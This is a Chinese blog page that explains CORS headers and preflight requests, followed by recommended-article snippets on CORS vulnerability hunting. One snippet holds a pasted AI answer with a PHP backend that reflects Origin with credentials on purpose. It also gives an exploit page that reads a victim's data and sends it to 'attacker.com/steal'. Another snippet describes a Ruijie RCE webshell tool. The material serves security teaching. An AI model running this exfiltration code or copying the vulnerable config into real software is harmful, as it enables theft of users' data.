CORS的介绍和漏洞挖掘

最新推荐文章于 2025-07-14 08:49:50 发布
原创 最新推荐文章于 2025-07-14 08:49:50 发布 · 2.9k 阅读 · 1 ·
CC 4.0 BY-SA版权
我希望自己永远怀着一颗学习的心!
文章标签:

#CORS的介绍

CORS

如果浏览器支持HTML5,那么就可以一劳永逸地使用新的跨域策略:CORS了。

CORS全称Cross-Origin Resource Sharing,是HTML5规范定义的如何跨域访问资源。

了解CORS前,我们先搞明白概念:

Origin表示本域,也就是浏览器当前页面的域。当JavaScript向外域(如sina.com)发起请求后,浏览器收到响应后,首先检查Access-Control-Allow-Origin是否包含本域,如果是,则此次跨域请求成功,如果不是,则请求失败,JavaScript将无法获取到响应的任何数据。

用一个图来表示就是:
https://www.liaoxuefeng.com/files/attachments/1027024093709472/l

假设本域是my.com外域是sina.com,只要响应头Access-Control-Allow-Origin为http://my.com,或者是*,本次请求就可以成功。

可见,跨域能否成功,取决于对方服务器是否愿意给你设置一个正确的Access-Control-Allow-Origin,决定权始终在对方手中。

上面这种跨域请求,称之为“简单请求”。简单请求包括GET、HEAD和POST(POST的Content-Type类型 仅限application/x-www-form-urlencoded、multipart/form-data和text/plain),并且不能出现任何自定义头(例如,X-Custom: 12345),通常能满足90%的需求。

无论你是否需要用JavaScript通过CORS跨域请求资源,你都要了解CORS的原理。最新的浏览器全面支持HTML5。在引用外域资源时,除了JavaScript和CSS外,都要验证CORS。例如,当你引用了某个第三方CDN上的字体文件时:

/* CSS */
@font-face {
  font-family: 'FontAwesome';
  src: url('http://cdn.com/fonts/fontawesome.ttf') format('truetype');
}

如果该CDN服务商未正确设置Access-Control-Allow-Origin,那么浏览器无法加载字体资源。

对于PUT、DELETE以及其他类型如application/json的POST请求,在发送AJAX请求之前,浏览器会先发送一个OPTIONS请求(称为preflighted请求)到这个URL上,询问目标服务器是否接受:

OPTIONS /path/to/resource HTTP/1.1
Host: bar.com
Origin: http://my.com
Access-Control-Request-Method: POST

服务器必须响应并明确指出允许的Method:

HTTP/1.1 200 OK
Access-Control-Allow-Origin: http://my.com
Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS
Access-Control-Max-Age: 86400

浏览器确认服务器响应的Access-Control-Allow-Methods头确实包含将要发送的AJAX请求的Method,才会继续发送AJAX,否则,抛出一个错误。

由于以POST、PUT方式传送JSON格式的数据在REST中很常见,所以要跨域正确处理POST和PUT请求,服务器端必须正确响应OPTIONS请求。

需要深入了解CORS的童鞋请移步W3C文档。
漏洞的挖掘可以移步:https://cloud.tencent.com/developer/article/1380045

渗透测试实践基础:CORS跨域集成
战神/calmness的博客
11-06 1505
目录 一、CORS漏洞原理 二、 漏洞挖掘 三、 检测方法 方法一: 方法二: 方法三: 四、 存在点 五 案例 1 利用CORS头部中错误配置的通配符(*) 2 利用错误匹配的不完整域名 3 利用XSS请求跨域站点 4 利用safari进行cors 5 高级利用手法: 利用再现: 工具 一、CORS漏洞原理 cors是H5提供的一种机制,WEB应用程序可以通过在HTTP增加字段来告诉浏览器,哪些不同来源的服务器是有权访问本站资源的,当不同域的请求发生时,就出现了...
漏洞挖掘】——37、CORS攻防原理
Fly_鹏程万里
06-06 99
CORS(Cross-Origin Resource Sharing)即跨源资源共享,CORS是W3C出的一个标准,其思想是使用自定义的HTTP头部让浏览器与服务器进行沟通,因为开发者需要通过跨域获取资源。
CORS跨域资源共享漏洞
网络安全爱好者
08-10 7468
首先明白几个概念 Origin(源)、SOP(同源策略) CROS(跨域资源访问) 分别是什么Origin三个要素构成了Origin,分别是访问 Web 内容时的协议(http://)域名(example.com)端口(:80)三者统称为源Origin详解SOP同源策略(Same Origin Policy),同源策略是基于浏览器的安全策略,它限制了网站之间不能随意互相读取访问对方的资源。只有请求源(本地)目标源(服务器)相同时,才能对相应资源进行读取。同源策略详解CORS。...
SRC挖掘经验-cors劫持账户.docx
04-13
懂的自然懂,也可以去一些知名社区找类似的。这个文档里写的有SRC漏洞挖掘的思路手法,需要用到一些抓包改包软件,例如burpsuite。不太了解这些工具的话可以先去了解一下。祝师傅日日挖高危。
什么是CORS?如何正确配置?
破损的天堂鸟博客
07-14 1394
CORS是平衡安全性与灵活性的关键技术,其核心在于。
Xray使用教程
CH3UHX9
04-12 9182
简介 Xray是长亭科技开发的一款漏扫工具。支持多种扫描方式漏洞类型。可自定义POC(Proof of Concept)概念验证,即漏洞验证程序。 俺是在 乌雲安全 看到了这个工具的使用,作为一个脚本小子初学者,这里做一下笔记。
CORS跨域
liuyuede123的博客
10-13 955
跨域资源共享 (CORS) 是一种基于 HTTP 标头的机制,它允许服务器指示除其自身之外的任何来源(域、方案或端口),浏览器应允许从中加载资源。 CORS 还依赖于一种机制,浏览器通过该机制向托管跨域资源的服务器发出“预检”请求,以检查服务器是否允许实际请求。 在该预检中,浏览器发送指示 HTTP 方法的标头将在实际请求中使用的标头。
漏洞挖掘】——38、DoraBox中CORS靶场
Fly_鹏程万里
06-06 266
根据需要配置Access-Control-Allow,例如配置信任域而不是使用*来运行所有的域访问。
生命在于学习——Cors漏洞
易水哲的博客
09-05 2642
Cors漏洞的学习笔记记录。
BurpSuite实战教程01-web渗透安全测试(靶场搭建及常见漏洞攻防)
热门推荐
liaomin416100569的专栏
12-13 1万+
渗透测试(Penetration test)即安全工程师模拟黑客,在合法授权范围内,通过信息搜集、漏洞挖掘、权限提升等行为,对目标对象进行安全测试(或攻击),最终找出安全风险并输出测试报告。Web渗透测试分为白盒测试黑盒测试,白盒测试是指目标网站的源码等信息的情况下对其渗透,相当于代码分析审计。而黑盒测试则是在对该网站系统信息不知情的情况下渗透。Web渗透分为以下几个步骤,信息收集,漏洞扫描,漏洞利用,提权,内网渗透,留后门,清理痕迹。
RuijieRCE:锐捷锐捷网络RCE突破检测工具,可批量检测
03-06
自述文件 瑞杰网络RCE漏洞检测工具,为方便渗透测试使用,可以批量检测,也会生成历史记录。同时也为防止他人恶意使用,可自定义GET参数密码,该密码由sha256加密,难以破解。 免责声明 由于传播,利用此文所提供的信息而造成的任何直接或间接的后果及损失,均由使用者本人负责,作者不承担任何责任。 参数 -f string 导入.txt文件批量扫描 -n string 自定义POST木马密码,默认cmd -p string 自定义GET密码验证,默认为cmd -u string 目标URL 使用 检测到防御后生成随机数.php文件执行命令,也可以上菜刀。 普通使用 GET密码:cmd POST密码:cmd ./RuijieRCE -u http://127.0.0.1:4430 设置密码 -n参数为POST密码,-p参数为GET密码这两
360前端星(第五天)——web安全&&VUE的简单介绍&&翻译&&代码质量单元测试
Stupid but Strong.
04-25 353
浏览器安全 同源策略 iframe被劫持 CORS是什么? XSS:恶意第三方想方设法让自己的js代码在当前页面执行 XSS的基本类型:stored(存储型)、reflected(反射型)、DOM-based(DOM型) stored:需要服务器通过设置标签白名单来进行防御 把传入的东西进行转义 禁止动态修改CSS资源引用 特殊协议(dataURL)(不重要) 任何情况下都不要用document....
BurpSuite之检测CORS方便化
https://www.cnblogs.com/zpchcbd/
07-28 3312
哈哈 标题够中二够沙雕果然会有人来看 分享下burpsuite挖掘cors的技巧哈!!! CORS漏洞主要看当我们发起的请求中带有Origin头部字段时,服务器的返回包带有CORS的相关字段并且允许Origin的域访问。 但是问题来了 我们每次检测CORS都需要手动的加上去那不会太麻烦吗(emm 除非你用工具批量检测哈 当我没说) 这里有个方法推荐给大家。 首先是自动在HTTP请求包中加上O...
掌握并理解 CORS (跨域资源共享)
油墨香^-^的博客
08-22 3189
在本文中,咱们研究了同源策略以及如何在需要时使用CORS来允许跨源请求。这需要服务器客户端设置,并且根据请求会出现预检请求。处理经过身份验证的跨域请求时,应格外小心。白名单可以帮助允许多个来源,而不会冒泄露敏感数据(在身份验证后受到保护)的风险。
CORS跨域资源共享漏洞复现
最新发布
08-13
<think>嗯,用户想复现CORS跨域资源共享漏洞进行安全测试或学习。这个问题涉及Web安全领域,需要结合漏洞原理实操步骤来解答。 用户可能是个安全研究员或渗透测试学习者,从"复现""渗透测试"等关键词能看出ta需要实操性指导。之前引用的资料里提到CORS漏洞常由错误配置引起,比如过度宽松的Access-Control-Allow-Origin设置,这点需要重点强调。 参考引用[4]特别指出不能仅凭Access-Control-Allow-Origin:*就判断漏洞存在,说明用户可能对漏洞判断存在误区。应该提醒ta注意凭证携带场景下的差异,比如配置为*时浏览器会拒绝带cookie的请求。 复现环境搭建是关键步骤。考虑分三层说明:后端漏洞配置(PHP/Node.js示例)、恶意页面构造、漏洞验证逻辑。引用[3]提到27.5%的网站存在CORS误配置,可以强调测试时关注Access-Control-Allow-Credentials头的重要性。 最后要补充防御建议,引用[5]提到很多人因图方便直接用默认配置导致漏洞,这点特别值得提醒开发人员。防御部分考虑区分开发人员安全测试者的不同关注点。 用户可能还会关心如何自动化检测,正好引用[3]提到开源工具,可以推荐CORS-Scanner之类的方案。不过当前问题聚焦复现,工具部分放在最后简要提及即可。 整个思考过程需确保:所有技术术语用中文,数学公式用$包裹,代码块单独标注,相关漏洞原理用行内公式如$HTTP$请求响应过程。最后按系统指令生成三个延伸问题,覆盖漏洞挖掘、修复实战场景。</think>以下是根据你的需求整理的CORS跨域漏洞复现步骤,结合渗透测试场景: --- ### **CORS漏洞复现步骤** #### **1. 搭建漏洞环境** **后端配置(PHP示例)** ```php <?php // 漏洞点:未校验Origin来源,直接反射请求头中的Origin值 header("Access-Control-Allow-Origin: " . $_SERVER['HTTP_ORIGIN']); header("Access-Control-Allow-Credentials: true"); // 允许携带凭证 // 模拟敏感数据接口 if(isset($_COOKIE['session'])) { echo json_encode(["user" => "admin", "email" => "admin@example.com"]); } ?> ``` #### **2. 构造恶意页面** ```html <!DOCTYPE html> <html> <body> <script> function exploit() { // 关键步骤:跨域请求目标站点(需诱导用户访问此页面) fetch('http://vuln-site.com/api/sensitive_data', { credentials: 'include' // 携带用户Cookie }) .then(response => response.json()) .then(data => { // 将窃取的数据发送到攻击者服务器 fetch('http://attacker.com/steal?data=' + JSON.stringify(data)); }); } exploit(); </script> </body> </html> ``` #### **3. 漏洞验证流程** - **触发条件**:用户登录`vuln-site.com`后访问恶意页面 - **攻击效果**: - 恶意脚本跨域读取`api/sensitive_data`接口的敏感数据 - 数据被发送至`attacker.com/steal`(攻击者服务器) #### **4. 关键漏洞配置分析** | **错误配置类型** | **风险示例** | |------------------------|---------------------------------------| | 动态反射Origin | `Access-Control-Allow-Origin: evil.com` | | 固定为`*`但需凭证 | `Access-Control-Allow-Origin: *` + `Allow-Credentials: true`[^4] | | 宽松的子域名匹配 | `Access-Control-Allow-Origin: *.example.com`(可被`x.example.evil.com`利用) | --- ### **渗透测试注意事项** 1. **凭证验证** - 仅当响应头包含`Access-Control-Allow-Credentials: true`时,浏览器才会发送Cookie[^2]。 - 若服务端配置`Access-Control-Allow-Origin: *`,浏览器将**拒绝携带凭证**的请求[^4]。 2. **Origin校验漏洞** - 漏洞核心:服务端未验证`Origin`头是否属于合法域名,直接反射回响应头[^5]。 - 测试方法:修改请求中的`Origin`头,观察响应是否动态反射该值。 3. **漏洞利用限制** - 需要诱导已认证用户访问恶意页面(类似CSRF攻击场景)[^2]。 - 敏感接口需存在未授权访问风险(如依赖Cookie认证)。 --- ### **防御方案** 1. **严格校验Origin白名单** ```php $allowed_origins = ["https://trusted.com"]; if (in_array($_SERVER['HTTP_ORIGIN'], $allowed_origins)) { header("Access-Control-Allow-Origin: " . $_SERVER['HTTP_ORIGIN']); } ``` 2. **避免动态反射Origin** 禁止未经验证的`Origin`值直接返回在响应头中[^3]。 3. **最小化凭证使用** 非必要场景不设置`Access-Control-Allow-Credentials: true`。 --- ### **自动化检测工具** - **CORS-Scanner**:扫描错误配置(如`*`+凭证、子域名通配符滥用)[^3] - **Burp Suite插件**:`CORS Scanner`模块可自动化探测反射型Origin漏洞 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值